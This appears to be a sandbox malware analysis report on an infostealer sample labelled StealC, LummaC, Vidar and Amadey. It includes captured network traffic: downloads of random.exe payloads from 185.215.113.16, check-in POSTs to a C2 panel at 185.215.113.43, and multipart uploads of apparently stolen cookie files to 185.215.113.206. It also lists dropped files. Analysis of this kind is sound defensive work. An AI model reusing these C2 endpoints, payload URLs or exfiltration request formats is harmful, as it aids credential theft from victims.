Nov 5, 2024 20:52:23.011322975 CET	1236	IN	Data Raw: fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 ea fc ff ff 83 ec 0c eb 8a 90 8d 74 26 00 83 fb 01 75 70 e8 c6 e4 0a 00 89 7c Data Ascii: t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'a

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:20.046896935 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Tue, 05 Nov 2024 18:57:36 GMT If-None-Match: "672a6aa0-20ec00"
Nov 5, 2024 20:52:20.951792955 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:20 GMT Last-Modified: Tue, 05 Nov 2024 18:57:36 GMT Connection: keep-alive ETag: "672a6aa0-20ec00"

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:22.803004026 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 39 36 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004196031&unit=246122658369
Nov 5, 2024 20:52:23.729001045 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:23.894167900 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 5, 2024 20:52:24.816068888 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:24 GMT Content-Type: application/octet-stream Content-Length: 2859008 Last-Modified: Tue, 05 Nov 2024 19:22:53 GMT Connection: keep-alive ETag: "672a708d-2ba000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2c 00 00 04 00 00 f9 06 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$, `@ @,,`Ui` @ @.rsrc`2@.idata 8@tfblgdez@+>+:@iqtyxzos +x+@.taggant@,"~+@
Nov 5, 2024 20:52:24.816160917 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816193104 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816226959 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816265106 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816299915 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816337109 CET	848	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816473961 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:24.816509008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2}D&q{Y.G~Gx;%K/37YAF^V.x+6;7=\|mWVo
Nov 5, 2024 20:52:24.816545010 CET	1236	IN	Data Raw: 92 47 dd ef 41 73 0b e8 12 bc 69 e0 cd f2 37 08 cd 6b cc 37 fb 6c f2 d1 02 53 ae 11 fd a5 c4 d5 fe be d7 58 14 94 d5 dd 5b 8c 5c 9e 04 7f f5 cb 66 3d d5 57 07 5f d8 e9 2b 54 af b0 68 64 1b 50 21 89 1f d2 f6 61 4c ba bc 90 e0 81 e5 ce a1 94 8c 1b Data Ascii: GAsi7k7lSX[\f=W_+ThdP!aL>K_*IQf\uY!2=,PpPf,Rq~RQae<xA\Jh,$to$#_x8oVJ&>?m
Nov 5, 2024 20:52:24.821481943 CET	1236	IN	Data Raw: b0 55 07 86 63 1c f8 b7 20 a2 f1 42 81 eb f9 b5 fc 0a e8 a7 25 14 00 4b 2a 13 8e 5d dc 44 22 94 2b bf eb fe ff 57 72 f4 c2 8c 92 a8 44 2f 4f fd ea 24 20 67 47 0e 42 fd e8 24 f8 d6 7e e6 0e 9e ea 4a f0 b0 fa 47 2c d0 97 c5 7d b4 8c 13 e1 cf 52 c6 Data Ascii: Uc B%K]D"+WrD/O$ gGB$~JG,}RL^Mu2\|>nuSAEf\|48;G)<MCCAEKh^@_5 aFHq4sLY^Y0YhMv%`ZTOeq.=,Z

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:27.286365986 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 5, 2024 20:52:28.169231892 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:28 GMT Content-Type: application/octet-stream Content-Length: 2157568 Last-Modified: Tue, 05 Nov 2024 18:57:36 GMT Connection: keep-alive ETag: "672a6aa0-20ec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 ef 18 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,s@s!@P.d. p.v@.rsrc .@.idata .@ *.@olexbnfi@0Y<@abdjuqmyps @.taggant0s" @
Nov 5, 2024 20:52:28.169272900 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:28.169296980 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:28.169315100 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:28.169332027 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 13J"qA1
Nov 5, 2024 20:52:28.169349909 CET	424	IN	Data Raw: 2f 4d 7c 35 b6 04 7b 38 f3 91 f3 86 0c 92 6e b3 46 5b 40 19 0f 57 6b 99 c8 f0 97 97 aa 29 fc 45 ae bc d4 8b f1 8e 62 8a 5b 35 41 80 b4 99 85 e3 fc af 77 49 27 55 72 62 38 90 76 18 fe 12 a5 5f 66 15 c9 7f d1 92 4c ed 23 2b a5 b9 f0 b4 b0 51 16 a4 Data Ascii: /M\|5{8nF[@Wk)Eb[5AwI'Urb8v_fL#+Q@QJp'H[/l[0S56R\rr\f N$G(stKZI0~/H{IS\WSxZ7<x.!7p
Nov 5, 2024 20:52:28.169555902 CET	1236	IN	Data Raw: 15 22 b3 36 7e 84 93 8a a0 c2 b3 60 f9 a8 15 fa e5 e0 95 95 d6 a9 eb bf a2 0f b0 bf b7 08 e4 72 20 b1 e3 3f 15 6d c1 3f 0a 58 fc 73 ff c2 07 41 f4 9c 13 b4 f0 cd 48 a0 52 71 82 45 3c 66 71 5f a9 99 c7 ab 03 a1 6d 6b df 45 ea 77 c3 18 34 86 f0 e4 Data Ascii: "6~`r ?m?XsAHRqE<fq_mkEw4EFf28X1QHp;Ckw0QDjqRl\p.=2us?Mlxx0SUs!mXO=)P$).NMplz5
Nov 5, 2024 20:52:28.169631958 CET	1236	IN	Data Raw: 9a 41 71 2d ce 14 00 9f ee 9d c7 47 30 a9 87 51 91 c9 a7 38 ae 3f 98 be c5 20 e8 fb 91 4c 62 7a b5 f8 b7 40 10 98 12 be 9e fc e8 3f f0 6c 68 48 30 d4 f9 a6 d0 00 ec 5b 44 31 79 d3 b4 11 ee 53 5c fa d6 9d a0 a9 80 ef e9 57 88 c7 29 0e 71 71 7c b1 Data Ascii: Aq-G0Q8? Lbz@?lhH0[D1yS\W)qq\|CAY`#HqeoNxL:73L{I`JPq<1I5@H8HdLBvXy?)<py1PrO6yq?$\|HWHk<{S@Xs8P
Nov 5, 2024 20:52:28.169646025 CET	1236	IN	Data Raw: 88 21 8b 57 d0 a9 a6 39 bd bc cd 5b c6 28 80 48 ee e4 70 20 c3 18 c4 74 c8 a0 f5 48 cd 20 71 07 78 f0 10 ae 5c d2 78 ef bd 4f 7c 43 30 44 09 40 d7 20 79 52 52 1a 78 9c 29 20 58 cf 3d bc 88 bc c5 19 10 9f c4 20 80 5b 35 cc a1 48 20 c9 b3 97 5b 5a Data Ascii: !W9[(Hp tH qx\xO\|C0D@ yRRx) X= [5H [ZH@$oJ?d[_?[p?w`HwhsSAY_fcIHx<x#\|gv&) yPLPhw:`yql1WReg]#-+wx
Nov 5, 2024 20:52:28.169661999 CET	1236	IN	Data Raw: e2 1a 88 ef c5 d2 27 53 ad 18 e4 9e 10 60 82 07 c0 1a 6b 60 9c c6 d0 57 8c a9 58 38 7b 1e 46 9a 45 9d 17 52 e8 05 90 b8 62 dc 78 c7 47 65 74 8f c5 b1 cb 40 49 5a 94 ac be 93 6f bf c5 b1 db 40 30 54 20 9c de 10 71 b3 b4 fb ed 7a 20 c2 86 b7 30 a9 Data Ascii: 'S`k`WX8{FERbxGet@IZo@0T qz 0Q5?t4z7#o4Dt_A't0c$8Ixqw&9y3%S+1ywz,0VTr'm`,o4DhHi!0wXy?T
Nov 5, 2024 20:52:28.174268961 CET	1236	IN	Data Raw: 40 00 79 50 24 a1 70 fa 48 c1 15 b0 ee a9 eb 40 a4 52 90 e3 18 36 f6 7f 44 a9 1f b4 f3 6f 84 1f c0 74 ad 53 b4 a9 25 12 05 fe 10 c6 f9 98 ad b8 59 dc 78 43 ef ff 70 37 fa b1 6f 40 40 59 d0 e0 1d a8 a1 48 d0 a1 da 4b a0 23 be 43 dc a9 80 67 bd f2 Data Ascii: @yP$pH@R6DotS%YxCp7o@@YHK#Cg(]eqpxwH$_4Lx{4"@;P<:a:jPRGJRRy?^x:j?'AK]ppH_>q'uHvUM~5>`39jur/4

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGIJJKKJJDAAAAAKFHJJDGDAFB

C:\ProgramData\FCAAEBFH

C:\ProgramData\FHCAFIDB

C:\ProgramData\FHCBGIIJKEBFCBGDBAEBGCFIEH

C:\ProgramData\JJJECFIECBGDGCAAAEHI

C:\ProgramData\JJJKFBAAAFHJEBFIEGID

C:\ProgramData\KJEHDHIEGIIIDHIDHDHJ

C:\ProgramData\chrome.dll

Windows Analysis Report
file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:29.088783979 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004197001&unit=246122658369
Nov 5, 2024 20:52:29.995245934 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:31.681822062 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 20:52:32.566565990 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:33.991028070 CET	202	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH Host: 185.215.113.206 Content-Length: 991 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 20:52:33.991028070 CET	991	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 38 61 61 61 30 Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"68aaa040a348c0a02a95cfab65f768ace1e01b6532547a7060256fae49df72e945bb6ae8------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Nov 5, 2024 20:52:35.414669037 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 20:52:35.538315058 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKJDBFBKKJEBFHJEHJD Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 38 61 61 61 30 34 30 61 33 34 38 63 30 61 30 32 61 39 35 63 66 61 62 36 35 66 37 36 38 61 63 65 31 65 30 31 62 36 35 33 32 35 34 37 61 37 30 36 30 32 35 36 66 61 65 34 39 64 66 37 32 65 39 34 35 62 62 36 61 65 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="token"68aaa040a348c0a02a95cfab65f768ace1e01b6532547a7060256fae49df72e945bb6ae8------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="file"------BKKJDBFBKKJEBFHJEHJD--
Nov 5, 2024 20:52:36.315176010 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:34.084495068 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 5, 2024 20:52:35.009361982 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:36.685201883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 20:52:37.595380068 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:39.721766949 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 5, 2024 20:52:40.495601892 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:42.386322975 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 20:52:43.313827991 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:44.839884996 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
